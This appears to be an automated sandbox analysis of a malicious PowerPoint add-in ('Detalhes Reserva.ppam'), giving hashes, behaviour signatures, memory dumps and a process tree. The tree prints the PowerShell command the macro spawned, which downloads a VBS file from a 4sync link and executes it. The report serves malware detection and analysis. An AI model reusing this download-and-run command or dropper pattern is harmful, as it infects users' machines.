Analysis

  • max time kernel
    1s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    05-01-2024 16:22

General

  • Target

    Detalhes Reserva.ppam

  • Size

    10KB

  • MD5

    836c98de1441fa0f9a5bcff58b665abf

  • SHA1

    1b1897a2a0d907cc94d0706b5ec4abd73e1afcc1

  • SHA256

    b4614240ec20d504a01d0782e88f2d2a0668b7afeb353427fe03ab22e3de8bd8

  • SHA512

    e83e55d6a0629bb4f813b290e923e5ab0e34d93f726c5fe1de2f35ec9930f38f896dd098d528d6ff8d0411e76badeb5a5cc07146c7cbb74495653639b69264d0

  • SSDEEP

    192:xrXP/72meEX+TgyGixbUlA9fsZ02w8DgtSqAnrb4KEv4V51IhDotEay51SpyYL:dXPqh5uSc038sNw04z13tgi

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Detalhes Reserva.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2032
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/LGzecL9s/R3PwqwiF.00ff0e7c0031b071557eeededd29f918 -o test.vbs; explorer.exe test.vbs
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\explorer.exe
          "C:\Windows\system32\explorer.exe" test.vbs
          3⤵
            PID:2608
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        1⤵
          PID:2684

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2380-0-0x000000002DE61000-0x000000002DE62000-memory.dmp
          Filesize

          4KB

        • memory/2380-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/2380-2-0x00000000729AD000-0x00000000729B8000-memory.dmp
          Filesize

          44KB

        • memory/2380-10-0x0000000005380000-0x0000000005480000-memory.dmp
          Filesize

          1024KB

        • memory/2380-21-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/2380-22-0x00000000729AD000-0x00000000729B8000-memory.dmp
          Filesize

          44KB

        • memory/2684-19-0x0000000003A20000-0x0000000003A30000-memory.dmp
          Filesize

          64KB

        • memory/2684-20-0x0000000003A10000-0x0000000003A11000-memory.dmp
          Filesize

          4KB

        • memory/2684-23-0x0000000003A10000-0x0000000003A11000-memory.dmp
          Filesize

          4KB

        • memory/2824-15-0x00000000007A0000-0x00000000007E0000-memory.dmp
          Filesize

          256KB

        • memory/2824-14-0x000000006B660000-0x000000006BC0B000-memory.dmp
          Filesize

          5.7MB

        • memory/2824-16-0x00000000007A0000-0x00000000007E0000-memory.dmp
          Filesize

          256KB

        • memory/2824-18-0x000000006B660000-0x000000006BC0B000-memory.dmp
          Filesize

          5.7MB

        • memory/2824-17-0x00000000007A0000-0x00000000007E0000-memory.dmp
          Filesize

          256KB

        • memory/2824-13-0x000000006B660000-0x000000006BC0B000-memory.dmp
          Filesize

          5.7MB